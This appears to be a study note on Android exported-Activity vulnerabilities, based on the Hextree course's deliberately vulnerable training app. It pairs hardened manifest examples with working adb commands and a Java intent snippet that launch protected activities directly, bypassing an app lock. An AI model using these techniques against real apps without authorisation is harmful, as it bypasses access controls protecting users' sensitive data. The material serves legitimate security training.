Activities

The example scenarios are taken from the Hextree Android course: https://app.hextree.io/map/android

An Activity is a single screen of an app that the user interacts with.

For a better understanding, also read about the Android Activity lifecycle.

If an Activity is sensitive and should not be reachable from third-party apps, it must be declared with the exported="false" flag in the manifest.
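As an added example (not from the Hextree app or the course), the manifest fragment below shows the weak declaration beside the hardened one for a constructed package com.example.vault; the activity and permission names are assumptions:

```xml
<!-- Added example for a constructed app com.example.vault;
     activity and permission names are assumptions. -->

<!-- BEFORE: the in-app PIN lock is bypassable, because any app on the
     device can start this activity directly (e.g. adb shell am start -n ...). -->
<activity
    android:name="com.example.vault.SecretsActivity"
    android:exported="true" />

<!-- AFTER: only components of this app can start it, so the PIN screen
     becomes the only way in. -->
<activity
    android:name="com.example.vault.SecretsActivity"
    android:exported="false" />

<!-- Caveat: an activity that declares an <intent-filter> is exported by
     default on older targetSdk levels. Always set android:exported
     explicitly (mandatory from Android 12 / API 31 onward). -->

<!-- If the activity must stay reachable by another app (e.g. a companion
     app signed with the same key), gate it with a signature-level
     permission instead of leaving it open. -->
<permission
    android:name="com.example.vault.permission.OPEN_SECRETS"
    android:protectionLevel="signature" />

<activity
    android:name="com.example.vault.ShareActivity"
    android:exported="true"
    android:permission="com.example.vault.permission.OPEN_SECRETS" />
```

Checking the manifest for exported="true" on activities without an intent filter is a quick way to find candidates for the scenarios listed below.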

Examples of vulnerable scenarios and their exploitation

  1. The app has an app-lock feature that prevents sensitive activities from opening until a PIN is entered, but the sensitive activity is declared with exported="true", so it can be started directly:

```shell
adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag1Activity"
```

  2. The activity is exported and expects a specific action:

```shell
adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag2Activity -a io.hextree.action.GIVE_FLAG"
```

  3. The activity is exported and expects an action together with a data URI:

```shell
adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag3Activity -a io.hextree.action.GIVE_FLAG -d 'https://app.hextree.io/map/android'"
```

  4. If a Parcelable (a kind of serializable) object has to be passed in the intent, we need to write our own app that interacts with the vulnerable app and sends the Parcelable object as an intent extra, because adb does not support sending complex data natively:

```java
import android.content.Intent;

// Runs inside an Activity of our own test app. Intent itself is Parcelable,
// so intents can be nested as extras of other intents.
Intent innerInnerIntent = new Intent();
innerInnerIntent.putExtra("reason", "back");

Intent innerIntent = new Intent();
innerIntent.putExtra("nextIntent", innerInnerIntent);   // nested Parcelable extra
innerIntent.putExtra("return", 42);

Intent outerIntent = new Intent();
outerIntent.setClassName("io.hextree.attacksurface",
        "io.hextree.attacksurface.activities.Flag5Activity");
// "android.intent.extra.INTENT" is the value of Intent.EXTRA_INTENT
outerIntent.putExtra("android.intent.extra.INTENT", innerIntent);
startActivity(outerIntent);
```

  5. If the vulnerable app handles the intent in onNewIntent, the intent must be sent with the flags Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP, so that the intent data is delivered to the already running activity instance instead of creating a new one.

  6. The exported activity expects specific extras.
